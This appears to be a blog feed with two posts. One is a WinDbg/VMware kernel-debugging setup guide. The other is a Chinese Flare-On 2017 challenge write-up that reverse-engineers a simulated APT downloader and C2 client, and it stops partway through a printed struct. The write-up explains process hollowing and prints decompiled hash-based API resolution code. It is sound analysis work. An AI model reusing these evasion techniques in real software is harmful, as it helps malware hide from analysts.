Lynn's Blog
2018-10-23T07:18:16+00:00
http://0x00.tw
Lynn Wu
0x000050@gmail.com
Setting up windows kernel-mode debugging with WinDbg and VMware
2018-10-20T00:00:00+00:00
http://0x00.tw/2018/10/20/Setting up windows kernel-mode debugging with WinDbg and VMware
<p>Since I have recently managed to learn about Windows Kernel Exploit and reverse Windows Driver, I decided to take notes and write down my experience. The article talks about configuring for VMware and WinDbg, setting Windows Boot, WinDbg Command, and WinDbg theme(todo). If you are also trying to debug Windows Kernel-mode via <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools">The Windows Debugger (WinDbg)</a>, this may be helpful to you.</p>
<h2 id="prerequisites">Prerequisites</h2>
<ul>
<li>Install Windows OS in the VMware.
<ul>
<li>[Method 1] To create a virtual machine from an ISO image. (I’ll be using <a href="https://my.vmware.com/web/vmware/info/slug/desktop_end_user_computing/vmware_workstation_pro/15_0">VMware Workstation</a>)</li>
<li>[Method 2] Free download is also available from <a href="https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/">Microsoft VM download page</a></li>
</ul>
</li>
<li>Install <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools">WinDbg</a> in the host system</li>
</ul>
<h2 id="configuring-for-vmware">Configuring for VMware</h2>
<p>We need to communication between Guest system and Host system, so we can using <a href="https://docs.microsoft.com/en-us/windows/desktop/ipc/named-pipes">named pipe</a> to simulate serial port (COM Port). We can add a named pipe serial port for connecting a virtual machine to an application or to another virtual machine that is running on the host system.</p>
<ul>
<li>Powered off the virtual machine.</li>
<li>For the Debugger VM, <code class="highlighter-rouge">Right Click</code> and selected <code class="highlighter-rouge">Settings</code> button.</li>
<li>Clicked <code class="highlighter-rouge">Add</code> button in the “VMware Machine Settings” dialog box. and selected <code class="highlighter-rouge">Serial Port</code> and click <code class="highlighter-rouge">Next</code> in the “Add Hardware Wizard” dialog box.</li>
</ul>
<p><img src="https://i.imgur.com/87ulCRB.png" alt="" /></p>
<ul>
<li>On next page, select <code class="highlighter-rouge">Output to named pipe</code> and click <code class="highlighter-rouge">Next</code>.</li>
</ul>
<p><img src="https://i.imgur.com/QiRUCi5.png" alt="" /></p>
<ul>
<li>Set a name for <code class="highlighter-rouge">Name pipe</code>, and note it, we will using it for WinDbg. For example: <code class="highlighter-rouge">\\.\pipe\win7_x64</code>. And select <code class="highlighter-rouge">This end is the server</code> and <code class="highlighter-rouge">The other end is an application</code>. Check <code class="highlighter-rouge">Connect at power on</code> then click <code class="highlighter-rouge">Finish</code>.</li>
</ul>
<p><img src="https://i.imgur.com/e0nJSBJ.png" alt="" /></p>
<ul>
<li>After clicking Finish, check <code class="highlighter-rouge">Yield CPU on poll</code>.</li>
</ul>
<p><img src="https://i.imgur.com/uGeCVmF.png" alt="" /></p>
<ul>
<li>SpecialNote: The new serial port <code class="highlighter-rouge">Serial Port 2</code> is corresponding to <code class="highlighter-rouge">COM2</code>. We will use this number when we are setting up <code class="highlighter-rouge">BCD</code>.</li>
</ul>
<p><img src="https://i.imgur.com/2FmI1lR.png" alt="" /></p>
<h2 id="windows-boot-guest-system">Windows Boot (Guest System)</h2>
<p>In Windows XP, we can modify <code class="highlighter-rouge">boot.ini</code> to change Windows startup options. After Windows 7, boot application settings is stored in <code class="highlighter-rouge">BCD</code>, we can use <a href="https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/bcdedit-command-line-options">BCDedit</a> to modify <code class="highlighter-rouge">BCD</code> file.</p>
<h3 id="windows-xp---bootini">Windows XP - <code class="highlighter-rouge">boot.ini</code></h3>
<ul>
<li><code class="highlighter-rouge">boot.ini</code> control how the operating system is booted and any startup options</li>
</ul>
<h3 id="windows-7--windows-10---boot-configuration-data-bcd">Windows 7 / Windows 10 - <code class="highlighter-rouge">Boot Configuration Data (BCD)</code></h3>
<ul>
<li>Run <code class="highlighter-rouge">cmd</code> as “administrator”, and execute the following commands:</li>
<li>Use Serial Port (COM Port) as the communication between debugger and debuggee. The number of debugport should be same as the VMware’s Serial Port setting, and the Serial Port number we had gotten is <code class="highlighter-rouge">2</code>.</li>
</ul>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bcdedit /dbgsettings serial debugport:2
</code></pre></div></div>
<ul>
<li>Enables or disables the kernel debugger for a specified boot entry. You can use the following syntax to enable kernel or boot debug.
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bcdedit /debug ON
</code></pre></div> </div>
</li>
<li>Restart Guest System</li>
</ul>
<p>SpecialNote: we just modify original boot option, instead of adding a boot option. We can save some time when booting.</p>
<h2 id="windbg">WinDbg</h2>
<p>If everything goes well, We can utilize cmd.exe to excute WinDbg to start the debugging session on the host system.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>windbg -b -k com:pipe,port=\\.\pipe\win7_x64,resets=0
</code></pre></div></div>
<p>About that <code class="highlighter-rouge">port</code>, if the debugger is running on the same computer as the virtual machine, enter the following command for Port. The <code class="highlighter-rouge">PipeName</code> from Serial Port, we just setting. If we forget it, we can find it at VMware (<code class="highlighter-rouge">VM > Settings... > Serial Port2 > Use named pipe</code>)</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>\\.\pipe\PipeName.
</code></pre></div></div>
<p>For more details, refer to <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/attaching-to-a-virtual-machine--kernel-mode-">Microsoft page</a></p>
<h3 id="load-symbols-in-windbg">Load Symbols in WinDbg</h3>
<p>You can load symbols and save the symbol path as part of a workspace.</p>
<h4 id="method-1-load-symbols-by-windbg-menu">[Method 1] Load symbols by WinDbg menu</h4>
<ul>
<li><code class="highlighter-rouge">File</code> > <code class="highlighter-rouge">Symbol File Path...</code> (or press <code class="highlighter-rouge">Ctrl</code>+<code class="highlighter-rouge">S</code>)</li>
<li>Input symbol path, and check <code class="highlighter-rouge">reload</code>. We usually download Microsoft symbols, if you have Symbols of your application, locally, flat list of PDB files, you also can load its.
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SRV* c:\Symbols *http://msdl.microsoft.com/download/symbols
</code></pre></div> </div>
</li>
</ul>
<h4 id="method-2-load-symbols-by-windbg-command-line">[Method 2] Load symbols by WinDbg Command line</h4>
<p>You need to download symbols from Microsoft for the first time.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.sympath srv*c:\Symbols*https://msdl.microsoft.com/download/symbols
</code></pre></div></div>
<p>After that, you just need to set up the local symbol folder path and reload the symbol.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.symfix+ c:\symbols
.reload
</code></pre></div></div>
<h4 id="method-3-load-symbols-by-windows-environment-variable">[Method 3] Load symbols by Windows environment variable</h4>
<p>There is an environment variable called <code class="highlighter-rouge">_NT_SYMBOL_PATH</code> which can be set to a symbol path as well.</p>
<ul>
<li>SpecialNote: If we set up the environment variable, it will impact WinDbg, Visual Studio, Process Explorer, Process Monitor, and potentially other softwares.</li>
</ul>
<h4 id="method-4-load-symbols-by-windows-commands">[Method 4] Load Symbols by Windows Commands</h4>
<p><code class="highlighter-rouge">WinDbg -y "<symbol path></code></p>
<h3 id="enable-output-of-dbgprint">Enable Output of DbgPrint</h3>
<ul>
<li>start / run / <code class="highlighter-rouge">regedit</code></li>
<li>Add the key patch <code class="highlighter-rouge">Debug Print Filter</code> in <code class="highlighter-rouge">HKLM\SYSTEM\CCS\Control\Session Manager</code></li>
<li>Under this key(<code class="highlighter-rouge">HKLM\SYSTEM\CCS\Control\Session Manager\Debug Print Filter</code>), create a value with the name <code class="highlighter-rouge">DEFAULT</code> and set this key value equals to the DWORD value <code class="highlighter-rouge">0x0000ffff</code>
<ul>
<li>SpecialNote: Do not set the value named as <code class="highlighter-rouge">default</code></li>
</ul>
</li>
</ul>
2017 Flare-On Challenge 12 missing (APT Attack Analysis)
2018-06-30T00:00:00+00:00
http://0x00.tw/2018/06/30/2017 Flare-On #12 missing
<p><code class="highlighter-rouge">missing</code> 的情境式是 APT attack 事件,需要透過封包解密以及逆向 Binary,來還原整個攻擊過程,取得 flag。其中包含還原 Malware Protocol,Malware Config,C2 Server 與 Client,受害者資訊,Plugins (加密/壓縮/指令功能),BMP 圖檔等,最後會在附錄附上解密的程式碼與解密後的封包內容。</p>
<hr />
<p>目錄:</p>
<ul>
<li>第零階段: 初步分析
<ul>
<li>coolprogram.exe</li>
<li>20170801_1300_filtered.pacp</li>
</ul>
</li>
<li>第一階段: 透過封包解密還原 Client (用於與 C2 溝通)
<ul>
<li>封包解密</li>
<li>Process Hollowing</li>
</ul>
</li>
<li>第二階段: 分析 C2 Client (secondstage.exe)
<ul>
<li>初始化函數 (Windows Shellcode 技巧)</li>
<li>解密設定檔 (Malware config)</li>
<li>透過 Socket 溝通</li>
</ul>
</li>
<li>第三階段: 利用預設指令集下載/安裝 Plugins (Processor default)
<ul>
<li>指令集</li>
<li>受害電腦的資訊</li>
<li>Plugins 資訊</li>
<li>還原 Plugins</li>
</ul>
</li>
<li>第四階段: 解析封包結構
<ul>
<li>Decrypt Header (size: 0x24)</li>
<li>Compress Header (size: 0x1c)</li>
<li>Processor Header (size: 0x24)</li>
</ul>
</li>
<li>第五階段: 分析 Plugins 解密封包與還原 C2 Server
<ul>
<li>Decrypt ID (CRPT)</li>
<li>Compress ID (COMP)</li>
<li>Processor ID (CMD)</li>
<li>C2 Server (srv2.exe)、pse.exe 與 cf.exe 以及 Client 封包資訊整理</li>
</ul>
</li>
<li>第六階段: 解密 C2 Server 的封包
<ul>
<li>Decrypt ID (CRPT)</li>
<li>Compress ID (COMP)</li>
<li>Server 的資訊</li>
<li>Server 封包資訊整理</li>
</ul>
</li>
<li>第七階段: 還原 lab10.zip.cry
<ul>
<li>分析加密程式 cf.exe</li>
<li>取得 flag</li>
</ul>
</li>
<li>附錄一: 解密封包的 PacketDecode.py</li>
<li>附錄二: 完整封包解密: 還原 C2 Server 與 Client 的溝通過程
<ul>
<li>Client 封包解密</li>
<li>Server 封包解密</li>
</ul>
</li>
</ul>
<hr />
<h2 id="第零階段-初步分析">第零階段: 初步分析</h2>
<p>[missing] 共提供兩個檔案,一個是封包檔 <code class="highlighter-rouge">20170801_1300_filtered.pacp</code>,另一個則是 32-bits PE 檔 <code class="highlighter-rouge">coolprogram.exe</code>。</p>
<h3 id="coolprogramexe"><code class="highlighter-rouge">coolprogram.exe</code></h3>
<p>透過 <code class="highlighter-rouge">Detect It Easy</code> 工具發現是使用 Delphi 語言編譯生成的 PE 檔。經過 IDA 逆向後,可以推測 <code class="highlighter-rouge">coolprogram.exe</code> 的功能是 downloader,會從指定的網站 (<code class="highlighter-rouge">maybe.suspicious.to/secondstage</code>) 下載一個加密的文件,並將其解密執行。</p>
<h3 id="20170801_1300_filteredpacp"><code class="highlighter-rouge">20170801_1300_filtered.pacp</code></h3>
<p><code class="highlighter-rouge">20170801_1300_filtered.pacp</code> 內有兩個 TCP 連線,用 Wireshark 可以看出由 IP <code class="highlighter-rouge">192.168.221.91</code> 連線到 IP <code class="highlighter-rouge">52.0.104.200</code></p>
<p><img src="https://i.imgur.com/NwPBTqf.png" alt="" /></p>
<ul>
<li>192.168.221.91:49815 <=> 52.0.104.200:80</li>
</ul>
<p>從指定的網站 <code class="highlighter-rouge">maybe.suspicious.to/secondstage</code> GET request,回傳的封包內容是被加密過的,推測這裡的封包行為是下載了一個加密的檔案</p>
<p><img src="https://i.imgur.com/5NBJS2n.png" alt="" /></p>
<ul>
<li>Stream: 192.168.221.91:49816 <=> 52.0.104.200:9443</li>
</ul>
<p><img src="https://i.imgur.com/o6vv4f8.png" alt="" /></p>
<h2 id="第一階段-透過封包解密還原-client-用於與-c2-溝通">第一階段: 透過封包解密還原 Client (用於與 c2 溝通)</h2>
<p>此階段的目的是利用 <code class="highlighter-rouge">coolprogram.exe</code> 來解密封包,還原封包中加密的檔案,該檔案推測是 Client,用於與 C2 溝通。</p>
<ul>
<li>
<p>Analysis files</p>
<table>
<thead>
<tr>
<th>File Format</th>
<th>Name</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>Pcap</td>
<td>20170801_1300_filtered.pacp</td>
<td>192.168.221.91:49815 <-> 52.0.104.200:80</td>
</tr>
<tr>
<td>PE</td>
<td>coolprogram.exe</td>
<td>downloader</td>
</tr>
</tbody>
</table>
</li>
<li>
<p>Dump file</p>
<table>
<thead>
<tr>
<th>File Format</th>
<th>Name</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>PE</td>
<td>secondstage.exe</td>
<td>C2 Client</td>
</tr>
</tbody>
</table>
</li>
</ul>
<h3 id="封包解密">封包解密</h3>
<p>首先,從封包中取得加密的資料,做法是將封包匯出存成 HTTP 格式的檔案 (File > Export Objects > HTTP)</p>
<p><img src="https://i.imgur.com/dt5zXPo.png" alt="" /></p>
<p>我們可以建立簡單的 Python Socket 來將匯出的封包資料傳送給 <code class="highlighter-rouge">coolprogram.exe</code> 解密,進而取得解密的檔案。但由於 <code class="highlighter-rouge">coolprogram.exe</code> 已經將 “目的地 Domain” 寫死為 <code class="highlighter-rouge">maybe.suspicious.to</code>,因此建立 Python Socket 前,我們需要修改 “目的地 Domain”,可行的做法是透過 Patch 將 Domain 改成 localhost,但這個方法的缺點是每次重新跑都需要 Patch,實在有點麻煩。</p>
<p>因此,我的做法是透過修改 <code class="highlighter-rouge">hosts</code> 設定檔 (Windows 系統的 hosts 設定檔路徑是 <code class="highlighter-rouge">C:\WINDOWS\system32\drivers\etc\hosts</code>),將 <code class="highlighter-rouge">maybe.suspicious.to</code> 導向 <code class="highlighter-rouge">127.0.0.1</code>,這樣一來,執行 <code class="highlighter-rouge">coolprogram.exe</code> 時就會連線至本機,我們就可以建立 Python Socket 來接收加密的封包資料了。</p>
<p>在順利的將封包資料傳給 <code class="highlighter-rouge">coolprogram.exe</code> 解密之後,我們要做的事情是”拿出解密後的資料”。我們需要知道檔案的”大小”以及”位置”,並透過 IDA python 來 dump file。檔案的大小可以與原先加密相同,因此可以用 <code class="highlighter-rouge">dir</code>查看封包匯出時的檔案 (<code class="highlighter-rouge">secondstage</code>) 大小來看需要 dump 的 Size 是 <code class="highlighter-rouge">119812</code></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Users\Lynn\Desktop\secondstage_pcap 的目錄
2018/06/20 下午 01:18 <DIR> .
2018/06/20 下午 01:18 <DIR> ..
2018/06/20 下午 01:17 119,812 secondstage
1 個檔案 119,812 位元組
2 個目錄 20,530,176,000 位元組可用
</code></pre></div></div>
<p>值得一提的是 <code class="highlighter-rouge">coolprogram.exe</code> 的 <code class="highlighter-rouge">sub_410DE8</code> 函數是 “Process Hollowing”。Process Hollowing 是一種惡意程式傀儡的技術。其原理是透過 <code class="highlighter-rouge">CreateProcess</code> 建立一個正常的 process 當作目標程式,且 <code class="highlighter-rouge">CreationFlag</code> 設為 <code class="highlighter-rouge">CREATE_SUSPENDED</code>,在 <code class="highlighter-rouge">coolprogram.exe</code> 之中的目標程式是”預設瀏覽器”。Process Hollowing 關鍵是用 <code class="highlighter-rouge">NtUnmapViewOfSection</code> 來 unmap 預設瀏覽器的 sections 再把惡意程式 mapping 進記憶體中,再透過 <code class="highlighter-rouge">SetContextThread</code> 設定 Entry Point,最後利用 <code class="highlighter-rouge">ResumeThread</code> 來恢復瀏覽器運作,執行惡意行為。</p>
<p><img src="https://i.imgur.com/cT1yGfh.png" alt="" /></p>
<p>檔案的位置可以透過 IDA 看出在 <code class="highlighter-rouge">sub_405D7c</code> 是 <code class="highlighter-rouge">memcpy</code> 的功能,其第二個參數 <code class="highlighter-rouge">0x4E4AE8</code> 是 PE 的開頭 <code class="highlighter-rouge">MZ</code></p>
<p><img src="https://i.imgur.com/CLRXYp9.png" alt="" /></p>
<p>得知檔案大小與位置後,可以用 IDA Python 來 dump <code class="highlighter-rouge">secondstage.exe</code></p>
<pre><code class="language-python=">Python>file = GetManyBytes(0x4E4AE8, 119812)
Python>open("secondstage.exe", "wb").write(file)
</code></pre>
<p>取得 <code class="highlighter-rouge">secondstage.exe</code>,也就是用於與 c2 溝通的 Client</p>
<h2 id="第二階段-分析-c2-client-secondstageexe">第二階段: 分析 C2 Client (<code class="highlighter-rouge">secondstage.exe</code>)</h2>
<p><code class="highlighter-rouge">secondstage.exe</code> 是一個後門程式,具有 Socket 的功能,用於與 C2 溝通。此外其惡意行為是透過下載模組 (Plugin) 並載入模組,來執行這些惡意功能。從 <code class="highlighter-rouge">Main</code> 函數中會看到先初始化函數,接著解密設定檔,最後是透過 Socket 溝通。</p>
<h3 id="初始化函數">初始化函數</h3>
<p>首先,值得注意是程式中用到了 Windows Shellcode 中常見的技巧,利用預先計算的函數名稱 hash 來取得所需要的 Windows API 位置,可以隱藏程式中的明文字串來增加分析難度。我們先找到載入 hash 解回 Windows API 的函數是 <code class="highlighter-rouge">sub_405060</code></p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">functions</span><span class="p">.</span><span class="n">version</span> <span class="o">=</span> <span class="mh">0x20170417</span><span class="p">;</span>
<span class="n">functions</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="mi">392</span><span class="p">;</span>
<span class="n">functions</span><span class="p">.</span><span class="n">hkernel32</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"kernel32"</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">hntdll</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"ntdll"</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">hshell32</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"shell32"</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">huser32</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"user32"</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">hadvapi32</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"advapi32"</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">hws2_32</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"ws2_32"</span><span class="p">);</span>
<span class="n">functions</span><span class="p">.</span><span class="n">hgdi32</span> <span class="o">=</span> <span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"gdi32"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">functions</span><span class="p">.</span><span class="n">hkernel32</span>
<span class="o">&&</span> <span class="n">functions</span><span class="p">.</span><span class="n">hntdll</span>
<span class="o">&&</span> <span class="n">functions</span><span class="p">.</span><span class="n">hshell32</span>
<span class="o">&&</span> <span class="n">functions</span><span class="p">.</span><span class="n">huser32</span>
<span class="o">&&</span> <span class="n">functions</span><span class="p">.</span><span class="n">hadvapi32</span>
<span class="o">&&</span> <span class="n">functions</span><span class="p">.</span><span class="n">hws2_32</span>
<span class="o">&&</span> <span class="n">functions</span><span class="p">.</span><span class="n">hgdi32</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">pdll</span> <span class="o">=</span> <span class="o">&</span><span class="n">functions</span><span class="p">.</span><span class="n">hkernel32</span><span class="p">;</span>
<span class="n">paddr</span> <span class="o">=</span> <span class="o">&</span><span class="n">functions</span><span class="p">.</span><span class="n">LoadLibraryA</span><span class="p">;</span>
<span class="n">num</span> <span class="o">=</span> <span class="n">dword_415690</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">phash</span> <span class="o">=</span> <span class="o">&</span><span class="n">dword_415690</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
<span class="k">while</span> <span class="p">(</span> <span class="n">num</span> <span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">num</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span>
<span class="p">{</span>
<span class="o">*</span><span class="n">paddr</span> <span class="o">=</span> <span class="n">GetProcAddressByHash</span><span class="p">(</span><span class="o">*</span><span class="n">pdll</span><span class="p">,</span> <span class="o">*</span><span class="n">phash</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="o">!*</span><span class="n">paddr</span> <span class="p">)</span>
<span class="k">return</span> <span class="n">result</span><span class="p">;</span>
<span class="o">++</span><span class="n">phash</span><span class="p">;</span>
<span class="o">++</span><span class="n">paddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="o">++</span><span class="n">pdll</span><span class="p">;</span>
<span class="n">num</span> <span class="o">=</span> <span class="o">*</span><span class="n">phash</span><span class="p">;</span>
<span class="o">++</span><span class="n">phash</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">result</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">result</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>從函數中可以看到存放 hash 表的位置是 <code class="highlighter-rouge">0x415690</code></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>25h, 0C8AC8026h, 1FC0EAEEh, 8F8F114h, 8F8F102h, 0F2FC4945h, 723EB0D5h, 67ECDE81h, 3D9972F5h, 95902B19h, 0D0498CD4h, 0D0498CC2h, 0B55AEA5Dh, 399354D8h, 6A3376B7h, 487FE16Bh, 0F3FD1C3h, 0C54374F3h, 6FB89AF0h, 6A582465h, 8D5A50CAh, 9E6FA842h, 69260152h, 12E88BC6h, 3DEF91ACh, 697A6AFEh, 3A35705Fh, 0BF78968Ah, 9C480E32h, 1297812Ch, 9802EF26h, 0A8D1FFE2h, 24C1C735h, 46318AD1h, 81D5763Eh, 32432452h, 279DEAC1h, 7B4842C1h, 0Ch, 5DB8FB17h, 5DBCF19Ah, 5DB8F59Eh, 4E58F56Fh, 2DD937DEh, 3DD92766h, 3E78F54Eh, 3E78F34Ah, 87B7BC52h, 0A84D25A0h, 0B81E8F04h, 728DA026h, 1, 0DF91E0A8h, 3, 0ABBC681Bh, 8EBEF5B1h, 7CBD2247h, 7, 8AD7DE22h, 453DB143h, 72760BB8h, 0B9D41C39h, 28E9E291h, 87FEDB50h, 5CB5EF72h, 13h, 0CDDE757Dh, 0E5971F6h, 0E797764h, 4C7C5841h, 939D7D9Ch, 0FC7AF16Ah, 8E9BF775h, 0EDD8FE8Ah, 8E878072h, 0D8923733h, 0C5A7764h, 9E7D3188h, 3C797B7Ah, 0D939F838h, 95E4A5D7h, 9400A044h, 0F44318C6h, 0B909D088h, 5D99726Ah, 6, 9E90B462h, 4894DAFCh, 0DF91A857h, 48B87EFCh, 6B3470D5h, 5AF0017Ch
</code></pre></div></div>
<p>透過 Debug 後發現,這些函數位置會被存放在一個結構中,我們可以在 IDA Pro 的 Local Type (快速鍵 <code class="highlighter-rouge">Alt+5</code>) 中進行定義,幫助後續的分析</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">4</span><span class="p">))</span> <span class="n">FUNCTIONS</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">version</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">size</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">hkernel32</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">hntdll</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">hshell32</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">huser32</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">hadvapi32</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">hws2_32</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">hgdi32</span><span class="p">;</span>
<span class="kt">void</span> <span class="o">*</span><span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">malloc</span><span class="p">)(</span><span class="kt">int</span><span class="p">);</span>
<span class="kt">void</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">free</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">mtrand</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">EncodeAndSend</span><span class="p">)(</span><span class="n">Client</span> <span class="o">*</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">LoadLibraryA</span><span class="p">)(</span><span class="kt">char</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">GetProcAddress</span><span class="p">)(</span><span class="n">HMODULE</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">CreateFileA</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreateFileW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetFileSizeEx</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CloseHandle</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetVolumeInformationW</span><span class="p">;</span>
<span class="kt">void</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">Sleep</span><span class="p">)(</span><span class="kt">int</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">ExitProcess</span><span class="p">)(</span><span class="n">DWORD</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">OutputDebugStringA</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">OutputDebugStringW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetDiskFreeSpaceExW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetDriveTypeW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetLogicalDrives</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">ReadFile</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">WriteFile</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">WaitForSingleObject</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreateThread</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">VirtualQuery</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreateEventW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">TerminateProcess</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetTickCount</span><span class="p">;</span>
<span class="n">LCID</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">GetUserDefaultLCID</span><span class="p">)();</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">GetComputerNameW</span><span class="p">)(</span><span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="n">DWORD</span> <span class="o">*</span><span class="p">);</span>
<span class="n">LPVOID</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">VirtualAlloc</span><span class="p">)(</span><span class="n">LPVOID</span> <span class="n">lpAddress</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">dwSize</span><span class="p">,</span> <span class="n">MACRO_MEM</span> <span class="n">flAllocationType</span><span class="p">,</span> <span class="n">MACRO_PAGE</span><span class="p">);</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">VirtualFree</span><span class="p">)(</span><span class="n">LPVOID</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">MACRO_MEM</span><span class="p">);</span>
<span class="n">HANDLE</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">CreateMutexW</span><span class="p">)(</span><span class="n">LPSECURITY_ATTRIBUTES</span><span class="p">,</span> <span class="n">BOOL</span><span class="p">,</span> <span class="n">LPCTSTR</span><span class="p">);</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">GetVersionExW</span><span class="p">)(</span><span class="n">LPOSVERSIONINFO</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">_GetLastError</span><span class="p">)();</span>
<span class="n">DWORD</span> <span class="n">GetEnvironmentVariableW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreatePipe</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">SetHandleInformation</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreateProcessW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">PeekNamedPipe</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">FindFirstFileW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">FindNextFileW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">FindClose</span><span class="p">;</span>
<span class="kt">void</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">memcpy</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
